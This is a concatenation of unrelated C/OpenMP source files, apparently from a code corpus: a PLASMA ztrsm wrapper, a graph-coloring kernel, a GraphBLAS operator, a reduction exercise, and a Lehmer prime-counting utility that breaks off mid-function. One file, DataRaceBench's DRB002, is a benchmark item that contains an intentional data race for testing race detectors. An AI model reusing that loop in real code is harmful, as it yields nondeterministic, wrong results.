* On entry, the ldb-by-n right hand side matrix B.
* On exit, if return value = 0, the ldb-by-n solution matrix X.
*
* @param[in] ldb
* The leading dimension of the array B. ldb >= max(1,m).
*
******************************************************************************/
__attribute__((weak))
void plasma_core_ztrsm(plasma_enum_t side, plasma_enum_t uplo,
plasma_enum_t transa, plasma_enum_t diag,
int m, int n,
plasma_complex64_t alpha, const plasma_complex64_t *A, int lda,
plasma_complex64_t *B, int ldb)
{
cblas_ztrsm(CblasColMajor,
(CBLAS_SIDE)side, (CBLAS_UPLO)uplo,
(CBLAS_TRANSPOSE)transa, (CBLAS_DIAG)diag,
m, n,
CBLAS_SADDR(alpha), A, lda,
B, ldb);
}
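/*
 * Illustrative usage sketch (not part of PLASMA): solve L*X = B for a
 * 2x2 lower triangular L through the wrapper above.  The guard macro
 * ZTRSM_USAGE_DEMO and the function name are hypothetical, added only
 * for this example.
 */
#ifdef ZTRSM_USAGE_DEMO
static void ztrsm_usage_demo(void)
{
    /* column-major 2x2: L = [[2, 0], [1, 4]] */
    plasma_complex64_t L[4] = {2.0, 1.0, 0.0, 4.0};
    plasma_complex64_t B[2] = {2.0, 5.0};   /* one right-hand side */
    plasma_core_ztrsm(PlasmaLeft, PlasmaLower, PlasmaNoTrans, PlasmaNonUnit,
                      2, 1, 1.0, L, 2, B, 2);
    /* B now holds X = [1, 1]^T, since 2*1 = 2 and 1*1 + 4*1 = 5 */
}
#endif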
/******************************************************************************/
void plasma_core_omp_ztrsm(
plasma_enum_t side, plasma_enum_t uplo,
plasma_enum_t transa, plasma_enum_t diag,
int m, int n,
plasma_complex64_t alpha, const plasma_complex64_t *A, int lda,
plasma_complex64_t *B, int ldb,
plasma_sequence_t *sequence, plasma_request_t *request)
{
int ak;
if (side == PlasmaLeft)
ak = m;
else
ak = n;
#pragma omp task depend(in:A[0:lda*ak]) \
depend(inout:B[0:ldb*n])
{
if (sequence->status == PlasmaSuccess)
plasma_core_ztrsm(side, uplo,
transa, diag,
m, n,
alpha, A, lda,
B, ldb);
}
}
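/*
 * Illustrative sketch (not part of PLASMA): the depend(in:)/depend(inout:)
 * clauses above let the OpenMP runtime order tasks by data flow instead of
 * explicit barriers.  The toy below shows the same pattern on plain arrays;
 * the guard macro and function name are hypothetical.
 */
#ifdef TRSM_TASK_DEPEND_DEMO
#include <stdio.h>
static void task_depend_demo(void)
{
    double A[4] = {1, 2, 3, 4};
    double B[4] = {0, 0, 0, 0};
    #pragma omp parallel
    #pragma omp master
    {
        /* producer: writes B, so the reader below must wait for it */
        #pragma omp task depend(out: B[0:4])
        for (int i = 0; i < 4; i++)
            B[i] = 2.0 * A[i];

        /* consumer: runs only after the producer task completes */
        #pragma omp task depend(in: B[0:4])
        printf("B[3] = %f\n", B[3]);
    }
    /* the implicit barrier at the end of the parallel region waits for
       all outstanding tasks */
}
#endif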
|
kernel1.h | /*
#include "worklist.h"
#include <vector>
#include <set>
using namespace std;
*/
#define MAXCOLOR 128
void FirstFit(int m, int nnz, int *csrRowPtr, int *csrColInd, Worklist &inwl, int *coloring)
{
unsigned start, end;
int ii;
start = inwl.start;
end = inwl.end;
#ifdef ENABLE_OPENMP
#pragma omp parallel for
#endif
for (ii = start; ii < end; ii++) {
int j, node, neighbors, neighbor_j;
node = inwl.getItem(ii);
int neighboroffset = csrRowPtr[node];
neighbors = csrRowPtr[node + 1] - neighboroffset;
unsigned v[MAXCOLOR / 32];
v[0] = 0xfffffffe;
for (j = 1; j < MAXCOLOR / 32; j++)
v[j] = 0xffffffff;
for (j = 0; j < neighbors; j++) {
neighbor_j = csrColInd[neighboroffset + j];
int color_j = coloring[neighbor_j];
if (color_j)
v[color_j / 32] &= ~(1 << (color_j % 32));
}
int c = 32;
for (int i = 0; i < MAXCOLOR / 32; i++) {
if (v[i] != 0) {
v[i] &= -(signed)v[i];
if (v[i]) c--;
if (v[i] & 0x0000ffff) c -= 16;
if (v[i] & 0x00ff00ff) c -= 8;
if (v[i] & 0x0f0f0f0f) c -= 4;
if (v[i] & 0x33333333) c -= 2;
if (v[i] & 0x55555555) c -= 1;
break;
}
else
c += 32;
}
coloring[node] = c;
}
}
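/* Sketch (not part of this kernel): after v[i] &= -v[i] the word holds only
   its lowest set bit, and the mask chain above recovers that bit's index.
   With the GCC/Clang count-trailing-zeros builtin the same first-free-color
   search is one line; the guard macro and function name are hypothetical. */
#ifdef FIRSTFIT_CTZ_DEMO
static inline int first_free_color(unsigned v_word, int word_idx)
{
    /* v_word has a 1 bit for every color still available in this word */
    return v_word ? word_idx * 32 + __builtin_ctz(v_word) : -1;
}
#endif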
void conflictDetect(int m, int nnz, int *csrRowPtr, int *csrColInd, Worklist &inwl, Worklist &outwl, int *coloring)
{
unsigned start, end;
int ii;
//inwl.myItems(start, end);
start = inwl.start;
end = inwl.end;
//printf("inwl=%d, outwl=%d, start=%d, end=%d\n", inwl.getSize(), outwl.getSize(), start, end);
#ifdef ENABLE_OPENMP
#pragma omp parallel for
#endif
for (ii = start; ii < end; ii++) {
int j, node, neighbors, neighbor_j;
node = inwl.getItem(ii);
//if (node == -1)
//continue;
int neighboroffset = csrRowPtr[node];
neighbors = csrRowPtr[node + 1] - neighboroffset;
//neighbors = graph.noutgoing[node];
for (j = 0; j < neighbors; j++) {
//neighbor_j = graph.edgessrcdst[graph.psrc[node] + j];
neighbor_j = csrColInd[neighboroffset + j];
if (coloring[node] == coloring[neighbor_j] && node < neighbor_j) {
//printf("c[%d] = c[%d] = %d\n", node, neighbor_j, coloring[node]);
outwl.push(node);
break;
}
}
//if (j == neighbors)
//printf("%d ok\tcolor[%d]=%d\n", node, node, coloring[node]);
}
}
void findMax(int *coloring, int n, int *ncolors) {
int i;
for (i = 0; i < n; i++) {
//printf("coloring[%d]=%d\n", i, coloring[i]);
if (coloring[i] > *ncolors)
*ncolors = coloring[i];
}
}
void color(int m, int nnz, int *csrRowPtr, int *csrColInd, int *ncolors, int *coloring)
{
Worklist inwl, outwl, *inwlptr, *outwlptr, *tmp;
double starttime, endtime;
double runtime;
//int nnodes = graph.nnodes;
inwl.ensureSpace(m);
outwl.ensureSpace(m);
inwlptr = &inwl;
outwlptr = &outwl;
unsigned *range;
range = (unsigned *)malloc(m * sizeof(unsigned));
for (unsigned i = 0; i < m; i++)
range[i] = i;
//inwl.pushRange(graph.srcsrc, nnodes);
inwl.pushRange(range, m);
int iteration = 0;
unsigned wlsz = inwl.getSize();
//printf("wlsz=%d, outwl=%d\n", wlsz, outwl.getSize());
//printf("solving.\n");
starttime = rtclock();
#ifdef ENABLE_OPENMP
while (wlsz) {
++iteration;
#endif
//FirstFit(graph, *inwlptr, coloring);
FirstFit(m, nnz, csrRowPtr, csrColInd, *inwlptr, coloring);
#ifdef ENABLE_OPENMP
/* no explicit sync needed: the parallel for inside FirstFit ends with an implicit barrier */
//printf("ok\n");
//conflictDetect(graph, *inwlptr, *outwlptr, coloring);
conflictDetect(m, nnz, csrRowPtr, csrColInd, *inwlptr, *outwlptr, coloring);
/* likewise, the parallel for inside conflictDetect ends with an implicit barrier */
//printf("ok\n");
//printf("iteration %d:inwl=%d, outwl=%d\n", iteration, wlsz, outwlptr->getSize());
wlsz = outwlptr->getSize();
tmp = inwlptr; inwlptr = outwlptr; outwlptr = tmp;
outwlptr->clear();
}
#endif
endtime = rtclock();
//verify<<<(nnodes - 1) / 1024 + 1, 1024>>>(graph, coloring, correct);
//CUDA_SAFE_CALL(cudaDeviceSynchronize());
//if (*correct) {
//findMax<<<(nnodes - 1) / 1024 + 1, 1024>>>(coloring, nnodes, ncolors);
findMax(coloring, m, ncolors);
//CUDA_SAFE_CALL(cudaDeviceSynchronize());
//}
runtime = (1000.0f * (endtime - starttime));
printf("runtime=%f\tcolors=%d\t", runtime, *ncolors);
}
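/* Sketch (hypothetical, self-contained): the inwlptr/outwlptr swap above is
   the classic worklist ping-pong; the toy below shows the same control flow
   on plain arrays, re-enqueueing items until none survive. */
#ifdef WORKLIST_PINGPONG_DEMO
static int pingpong_rounds(int *in, int n_in, int *out)
{
    int rounds = 0;
    while (n_in > 0) {
        int n_out = 0;
        for (int i = 0; i < n_in; i++)
            if (in[i] > 1)               /* "conflict": keep halving until <= 1 */
                out[n_out++] = in[i] / 2;
        int *tmp = in; in = out; out = tmp;   /* swap roles */
        n_in = n_out;
        rounds++;
    }
    return rounds;
}
#endif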
|
GB_unaryop__ainv_uint64_int8.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__ainv_uint64_int8
// op(A') function: GB_tran__ainv_uint64_int8
// C type: uint64_t
// A type: int8_t
// cast: uint64_t cij = (uint64_t) aij
// unaryop: cij = -aij
#define GB_ATYPE \
int8_t
#define GB_CTYPE \
uint64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
int8_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = -x ;
// casting
#define GB_CASTING(z, x) \
uint64_t z = (uint64_t) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
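// Worked example (illustrative, not generated code): for aij = 3 the macros
// above expand to a cast followed by a negate modulo 2^64, so cij becomes
// 2^64 - 3.  The guard macro and function name below are hypothetical.
#ifdef GB_AINV_UINT64_INT8_DEMO
#include <stdio.h>
static void GB_ainv_demo (void)
{
    int8_t aij = 3 ;
    uint64_t x = (uint64_t) aij ;   // GB_CASTING: cast first
    uint64_t cij = -x ;             // GB_OP: then negate, wrapping mod 2^64
    printf ("%llu\n", (unsigned long long) cij) ;   // 18446744073709551613
}
#endif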
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_AINV || GxB_NO_UINT64 || GxB_NO_INT8)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__ainv_uint64_int8
(
uint64_t *restrict Cx,
const int8_t *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__ainv_uint64_int8
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t **Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
reduction-clauseModificado7.c | #include <stdio.h>
#include <stdlib.h>
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_thread_num() 0
#endif
int main(int argc, char **argv) {
int i, n = 20, a[n], suma = 0;
if(argc < 2){
fprintf(stderr,"Falta iteraciones\n");
exit(-1);
}
n = atoi(argv[1]);
if (n > 20) { n = 20; printf("n=%d", n); }
for(i=0;i<n;i++) a[i]=i;
#pragma omp parallel private(i) reduction(+:suma)
{
for(i=omp_get_thread_num();i<n;i+=omp_get_num_threads()){
suma += a[i];
printf("\nthread %d suma a[%d] y suma vale: %d ", omp_get_thread_num(), i,suma);
}
}
printf("\nTras 'parallel' suma=%d\n",suma);
}
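/* Equivalent sketch (illustrative): the same reduction with the worksharing
   construct instead of the manual round-robin distribution above.  The
   guard macro and function are hypothetical, added only for comparison. */
#ifdef REDUCTION_FOR_DEMO
static int sum_array(const int *a, int n)
{
  int suma = 0;
  #pragma omp parallel for reduction(+:suma)
  for (int i = 0; i < n; i++)
    suma += a[i];
  return suma;
}
#endif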
|
DRB002-antidep1-var-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
A loop with loop-carried anti-dependence.
Data race pair: a[i+1]@67:10 vs. a[i]@67:5
*/
#include <stdlib.h>
int main(int argc, char* argv[])
{
int i;
int len = 1000;
if (argc>1)
len = atoi(argv[1]);
int a[len];
for (i=0; i<len; i++)
a[i]= i;
#pragma omp parallel for schedule(dynamic)
for (i=0;i< len -1 ;i++)
a[i]=a[i+1]+1;
return 0;
}
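/* Sketch of one race-free variant (illustrative, not part of DataRaceBench):
   reading from a snapshot removes the anti-dependence, since the write to
   a[i] can no longer race with a read of a[i+1].  The guard macro and
   function are hypothetical. */
#ifdef DRB002_FIXED_DEMO
#include <string.h>
static void antidep_fixed(int *a, int len)
{
  int *b = malloc(sizeof(int) * len);   /* <stdlib.h> is included above */
  memcpy(b, a, sizeof(int) * len);
  #pragma omp parallel for
  for (int i = 0; i < len - 1; i++)
    a[i] = b[i + 1] + 1;
  free(b);
}
#endif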
|
lehmer.c | #if defined(LEHMER) || defined(PRIMESIEVE_STANDALONE)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
/*****************************************************************************
*
* Lehmer prime counting utility. Calculates pi(x), count of primes <= x.
*
* Copyright (c) 2012-2013 Dana Jacobsen (dana@acm.org).
* This is free software; you can redistribute it and/or modify it under
* the same terms as the Perl 5 programming language system itself.
*
* This file is part of the Math::Prime::Util Perl module, but also can be
* compiled as a standalone UNIX program using primesieve 5.x.
*
* g++ -O3 -DPRIMESIEVE_STANDALONE lehmer.c -o prime_count -lprimesieve
*
* The phi(x,a) calculation is unique, to the best of my knowledge. It uses
* two lists of all x values + signed counts for the given 'a' value, and walks
* 'a' down until it is small enough to calculate directly using a table.
* This is relatively fast and low memory compared to many other solutions.
* As with all Lehmer-Meissel-Legendre algorithms, memory use will be a
* constraint with large values of x.
*
* Math::Prime::Util now includes an extended LMO implementation, which will
* be quite a bit faster and much less memory than this code. It is the
* default method for large counts. Timing comparisons are in that file.
*
* Times and memory use for prime_count(10^15) on a Haswell 4770K, asterisk
* indicates parallel operation. The standalone versions of my code use
* Kim Walisch's excellent primesieve, which is faster than my sieve.
* His Lehmer/Meissel/Legendre seem a bit slower in serial, but
* parallelize much better.
*
* 4.74s 1.3MB LMO
* 24.53s* 137.9MB Lehmer Walisch primecount v0.9, 8 threads
* 38.74s* 150.3MB LMOS Walisch primecount v0.9, 8 threads
* 42.52s* 159.4MB Lehmer standalone, 8 threads
* 42.82s* 137.9MB Meissel Walisch primecount v0.9, 8 threads
* 51.88s 153.9MB LMOS standalone, 1 thread
* 52.01s* 145.5MB Legendre Walisch primecount v0.9, 8 threads
* 64.96s 160.3MB Lehmer standalone, 1 thread
* 67.16s 67.0MB LMOS
* 80.42s 286.6MB Meissel
* 99.70s 159.6MB Lehmer
* 107.43s 28.5MB Lehmer Walisch primecount v0.9, 1 thread
* 174.51s 83.5MB Legendre
* 185.11s 25.6MB LMOS Walisch primecount v0.9, 1 thread
* 191.19s 24.8MB Meissel Walisch primecount v0.9, 1 thread
* 868.96s 1668.1MB Lehmer pix4 by T.R. Nicely
*
* Reference: Hans Riesel, "Prime Numbers and Computer Methods for
* Factorization", 2nd edition, 1994.
*/
/* Below this size, just sieve (with table speedup). */
#define SIEVE_LIMIT 60000000
#define MAX_PHI_MEM (896*1024*1024)
static int const verbose = 0;
#define STAGE_TIMING 0
#if STAGE_TIMING
#include <sys/time.h>
#define DECLARE_TIMING_VARIABLES struct timeval t0, t1;
#define TIMING_START gettimeofday(&t0, 0);
#define TIMING_END_PRINT(text) \
{ unsigned long long t; \
gettimeofday(&t1, 0); \
t = (t1.tv_sec-t0.tv_sec) * 1000000 + (t1.tv_usec - t0.tv_usec); \
printf("%s: %10.5f\n", text, ((double)t) / 1000000); }
#else
#define DECLARE_TIMING_VARIABLES
#define TIMING_START
#define TIMING_END_PRINT(text)
#endif
#ifdef PRIMESIEVE_STANDALONE
/* countPrimes can be pretty slow for small ranges, so sieve more small primes
* and count using binary search. Uses a lot of memory though. For big
* ranges, countPrimes is really fast. If you use primesieve 4.2, the
* crossover point is lower (better). */
#define SIEVE_MULT 10
/* Translations from Perl + Math::Prime::Util to C/C++ + primesieve */
typedef unsigned long UV;
typedef signed long IV;
#define UV_MAX ULONG_MAX
#define UVCONST(x) ((unsigned long)x##UL)
#define New(id, mem, size, type) mem = (type*) malloc((size)*sizeof(type))
#define Newz(id, mem, size, type) mem = (type*) calloc(size, sizeof(type))
#define Renew(mem, size, type) mem = (type*) realloc(mem,(size)*sizeof(type))
#define Safefree(mem) free((void*)mem)
#define croak(fmt,...) { printf(fmt,##__VA_ARGS__); exit(1); }
#define prime_precalc(n) /* */
#define BITS_PER_WORD ((ULONG_MAX <= 4294967295UL) ? 32 : 64)
static UV isqrt(UV n) {
UV root;
if (sizeof(UV) == 8 && n >= 18446744065119617025UL) return 4294967295UL;
if (sizeof(UV) == 4 && n >= 4294836225UL) return 65535UL;
root = (UV) sqrt((double)n);
while (root*root > n) root--;
while ((root+1)*(root+1) <= n) root++;
return root;
}
static UV icbrt(UV n) {
UV b, root = 0;
int s;
if (sizeof(UV) == 8) {
s = 63; if (n >= 18446724184312856125UL) return 2642245UL;
} else {
s = 30; if (n >= 4291015625UL) return 1625UL;
}
for ( ; s >= 0; s -= 3) {
root += root;
b = 3*root*(root+1)+1;
if ((n >> s) >= b) {
n -= b << s;
root++;
}
}
return root;
}
/* Use version 5.x of PrimeSieve */
#include <limits.h>
#include <sys/time.h>
#include <primesieve.hpp>
#include <vector>
#ifdef _OPENMP
#include <omp.h>
#endif
#define _XS_prime_count(a, b) primesieve::parallel_count_primes(a, b)
/* Generate an array of n small primes, where the kth prime is element p[k].
* Remember to free when done. */
#define TINY_PRIME_SIZE 20000
static uint32_t* tiny_primes = 0;
static uint32_t* generate_small_primes(UV n)
{
uint32_t* primes;
New(0, primes, n+1, uint32_t);
if (n < TINY_PRIME_SIZE) {
if (tiny_primes == 0)
tiny_primes = generate_small_primes(TINY_PRIME_SIZE+1);
memcpy(primes, tiny_primes, (n+1) * sizeof(uint32_t));
return primes;
}
primes[0] = 0;
{
std::vector<uint32_t> v;
primesieve::generate_n_primes(n, &v);
memcpy(primes+1, &v[0], n * sizeof(uint32_t));
}
return primes;
}
#else
/* We will use pre-sieving to speed up counting for small ranges */
#define SIEVE_MULT 1
#define FUNC_isqrt 1
#define FUNC_icbrt 1
#include "lehmer.h"
#include "util.h"
#include "cache.h"
#include "sieve.h"
/* Generate an array of n small primes, where the kth prime is element p[k].
* Remember to free when done. */
static uint32_t* generate_small_primes(UV n)
{
uint32_t* primes;
UV i = 0;
double fn = (double)n;
double flogn = log(fn);
double flog2n = log(flogn);
UV nth_prime = /* Dusart 2010 for > 179k, custom for 18-179k */
(n >= 688383) ? (UV) ceil(fn*(flogn+flog2n-1.0+((flog2n-2.00)/flogn))) :
(n >= 178974) ? (UV) ceil(fn*(flogn+flog2n-1.0+((flog2n-1.95)/flogn))) :
(n >= 18) ? (UV) ceil(fn*(flogn+flog2n-1.0+((flog2n+0.30)/flogn)))
: 59;
if (n > 203280221)
croak("generate small primes with argument too large: %lu\n", (unsigned long)n);
New(0, primes, n+1, uint32_t);
primes[0] = 0;
START_DO_FOR_EACH_PRIME(2, nth_prime) {
if (i >= n) break;
primes[++i] = p;
} END_DO_FOR_EACH_PRIME
if (i < n)
croak("Did not generate enough small primes.\n");
if (verbose > 1) printf("generated %lu small primes, from 2 to %lu\n", i, (unsigned long)primes[i]);
return primes;
}
#endif
/* Given an array of primes[1..lastprime], return Pi(n) where n <= lastprime.
* This is actually quite fast, and definitely faster than sieving. By using
* this we can avoid caching prime counts and also skip most calls to the
* segment siever.
*/
static UV bs_prime_count(uint32_t n, uint32_t const* const primes, uint32_t lastidx)
{
UV i, j;
if (n <= 2) return (n == 2);
/* If n is out of range, we could:
* 1. return _XS_prime_count(2, n);
* 2. if (n == primes[lastidx]) return lastidx else croak("bspc range");
* 3. if (n >= primes[lastidx]) return lastidx;
*/
if (n >= primes[lastidx]) return lastidx;
j = lastidx;
if (n < 8480) {
i = 1 + (n>>4);
if (j > 1060) j = 1060;
} else if (n < 25875000) {
i = 793 + (n>>5);
if (j > (n>>3)) j = n>>3;
} else {
i = 1617183;
if (j > (n>>4)) j = n>>4;
}
while (i < j) {
UV mid = i + (j-i)/2;
if (primes[mid] <= n) i = mid+1;
else j = mid;
}
/* if (i-1 != _XS_prime_count(2, n)) croak("wrong count for %lu: %lu vs. %lu\n", n, i-1, _XS_prime_count(2, n)); */
return i-1;
}
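/* Usage sketch (hypothetical): with a 1-indexed prime table as described
 * above, bs_prime_count(10, primes, 6) binary-searches its way to 4,
 * i.e. the primes 2, 3, 5, 7.  Guard macro and function are hypothetical. */
#ifdef BSPC_DEMO
static void bspc_demo(void)
{
  static const uint32_t primes[] = {0, 2, 3, 5, 7, 11, 13};
  UV pc = bs_prime_count(10, primes, 6);   /* -> 4 */
  (void) pc;
}
#endif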
#define FAST_DIV(x,y) \
( ((x) <= 4294967295U) ? (uint32_t)(x)/(uint32_t)(y) : (x)/(y) )
/* static uint32_t sprime[] = {0,2, 3, 5, 7, 11, 13, 17, 19, 23}; */
/* static uint32_t sprimorial[] = {1,2,6,30,210,2310,30030,510510}; */
/* static uint32_t stotient[] = {1,1,2, 8, 48, 480, 5760, 92160}; */
static const uint16_t _s0[ 1] = {0};
static const uint16_t _s1[ 2] = {0,1};
static const uint16_t _s2[ 6] = {0,1,1,1,1,2};
static const uint16_t _s3[30] = {0,1,1,1,1,1,1,2,2,2,2,3,3,4,4,4,4,5,5,6,6,6,6,7,7,7,7,7,7,8};
static uint16_t _s4[210];
static uint16_t _s5[2310];
static uint16_t _s6[30030];
static const uint16_t* sphicache[7] = { _s0,_s1,_s2,_s3,_s4,_s5,_s6 };
static int sphi_init = 0;
#define PHIC 7
static UV tablephi(UV x, uint32_t a) {
switch (a) {
case 0: return x;
case 1: return x-x/2;
case 2: return x-x/2-x/3+x/6;
case 3: return (x/ 30U) * 8U + sphicache[3][x % 30U];
case 4: return (x/ 210U) * 48U + sphicache[4][x % 210U];
case 5: return (x/ 2310U) * 480U + sphicache[5][x % 2310U];
case 6: return (x/ 30030U) * 5760U + sphicache[6][x % 30030U];
#if PHIC >= 7
case 7: {
UV xp = x / 17U;
return ((x /30030U) * 5760U + sphicache[6][x % 30030U]) -
((xp/30030U) * 5760U + sphicache[6][xp % 30030U]);
}
#endif
#if PHIC >= 8
case 8: {
UV xp = x / 17U;
UV x2 = x / 19U;
UV x2p = x2 / 17U;
return ((x /30030U) * 5760U + sphicache[6][x % 30030U]) -
((xp /30030U) * 5760U + sphicache[6][xp % 30030U]) -
((x2 /30030U) * 5760U + sphicache[6][x2 % 30030U]) +
((x2p/30030U) * 5760U + sphicache[6][x2p% 30030U]);
}
#endif
default: croak("a %u too large for tablephi\n", a);
}
}
static void phitableinit(void) {
if (sphi_init == 0) {
int x;
for (x = 0; x < 210; x++)
_s4[x] = ((x/ 30)* 8+_s3[x% 30])-(((x/ 7)/ 30)* 8+_s3[(x/ 7)% 30]);
for (x = 0; x < 2310; x++)
_s5[x] = ((x/ 210)* 48+_s4[x% 210])-(((x/11)/ 210)* 48+_s4[(x/11)% 210]);
for (x = 0; x < 30030; x++)
_s6[x] = ((x/2310)*480+_s5[x%2310])-(((x/13)/2310)*480+_s5[(x/13)%2310]);
sphi_init = 1;
}
}
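/* Worked check (illustrative): phi(100,3) counts 1..100 with no factor in
 * {2,3,5}: (100/30)*8 + _s3[100%30] = 3*8 + 2 = 26.  The guard macro and
 * function below are hypothetical. */
#ifdef TABLEPHI_DEMO
static void tablephi_demo(void)
{
  phitableinit();               /* fills _s4.._s6 (case 3 needs only _s3) */
  UV r = tablephi(100, 3);      /* -> 26 */
  (void) r;
}
#endif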
/* Max memory = 2*X*A bytes, e.g. 2*65536*256 = 32 MB */
#define PHICACHEA 512
#define PHICACHEX 65536
typedef struct
{
uint32_t max[PHICACHEA];
int16_t* val[PHICACHEA];
} cache_t;
static void phicache_init(cache_t* cache) {
int a;
for (a = 0; a < PHICACHEA; a++) {
cache->val[a] = 0;
cache->max[a] = 0;
}
phitableinit();
}
static void phicache_free(cache_t* cache) {
int a;
for (a = 0; a < PHICACHEA; a++) {
if (cache->val[a] != 0)
Safefree(cache->val[a]);
cache->val[a] = 0;
cache->max[a] = 0;
}
}
#define PHI_CACHE_POPULATED(x, a) \
((a) < PHICACHEA && (UV) cache->max[a] > (x) && cache->val[a][x] != 0)
static void phi_cache_insert(uint32_t x, uint32_t a, IV sum, cache_t* cache) {
uint32_t cap = ( (x+32) >> 5) << 5;
/* If sum is too large for the cache, just ignore it. */
if (sum < SHRT_MIN || sum > SHRT_MAX) return;
if (cache->val[a] == 0) {
Newz(0, cache->val[a], cap, int16_t);
cache->max[a] = cap;
} else if (cache->max[a] < cap) {
uint32_t i;
Renew(cache->val[a], cap, int16_t);
for (i = cache->max[a]; i < cap; i++)
cache->val[a][i] = 0;
cache->max[a] = cap;
}
cache->val[a][x] = (int16_t) sum;
}
static IV _phi3(UV x, UV a, int sign, const uint32_t* const primes, const uint32_t lastidx, cache_t* cache)
{
IV sum;
if (a <= 1)
return sign * ((a == 0) ? x : x-x/2);
else if (PHI_CACHE_POPULATED(x, a))
return sign * cache->val[a][x];
else if (a <= PHIC)
sum = sign * tablephi(x,a);
else if (x < primes[a+1])
sum = sign;
else if (x <= primes[lastidx] && x < primes[a+1]*primes[a+1])
sum = sign * (bs_prime_count(x, primes, lastidx) - a + 1);
else {
UV a2, iters = (a*a > x) ? bs_prime_count( isqrt(x), primes, a) : a;
UV c = (iters > PHIC) ? PHIC : iters;
IV phixc = PHI_CACHE_POPULATED(x, c) ? cache->val[c][x] : (IV)tablephi(x,c);
sum = sign * (iters - a + phixc);
for (a2 = c+1; a2 <= iters; a2++)
sum += _phi3(FAST_DIV(x,primes[a2]), a2-1, -sign, primes, lastidx, cache);
}
if (a < PHICACHEA && x < PHICACHEX)
phi_cache_insert(x, a, sign * sum, cache);
return sum;
}
#define phi_small(x, a, primes, lastidx, cache) _phi3(x, a, 1, primes, lastidx, cache)
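/* Worked check of the recurrence phi(x,a) = phi(x,a-1) - phi(x/p_a, a-1)
 * (illustrative): phi(100,4) = phi(100,3) - phi(14,3) = 26 - 4 = 22.
 * The guard macro and function below are hypothetical. */
#ifdef PHI_SMALL_DEMO
static void phi_small_demo(void)
{
  static const uint32_t primes[] = {0, 2, 3, 5, 7, 11};
  cache_t cache;
  phicache_init(&cache);
  IV r = phi_small(100, 4, primes, 5, &cache);   /* -> 22 */
  phicache_free(&cache);
  (void) r;
}
#endif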
/******************************************************************************/
/* In-order lists for manipulating our UV value / IV count pairs */
/******************************************************************************/
typedef struct {
UV v;
IV c;
} vc_t;
typedef struct {
vc_t* a;
UV size;
UV n;
} vcarray_t;
static vcarray_t vcarray_create(void)
{
vcarray_t l;
l.a = 0;
l.size = 0;
l.n = 0;
return l;
}
static void vcarray_destroy(vcarray_t* l)
{
if (l->a != 0) {
if (verbose > 2) printf("FREE list %p\n", l->a);
Safefree(l->a);
}
l->size = 0;
l->n = 0;
}
/* Insert a value/count pair. We do this indirection because about 80% of
* the calls result in a merge with the previous entry. */
static void vcarray_insert(vcarray_t* l, UV val, IV count)
{
UV n = l->n;
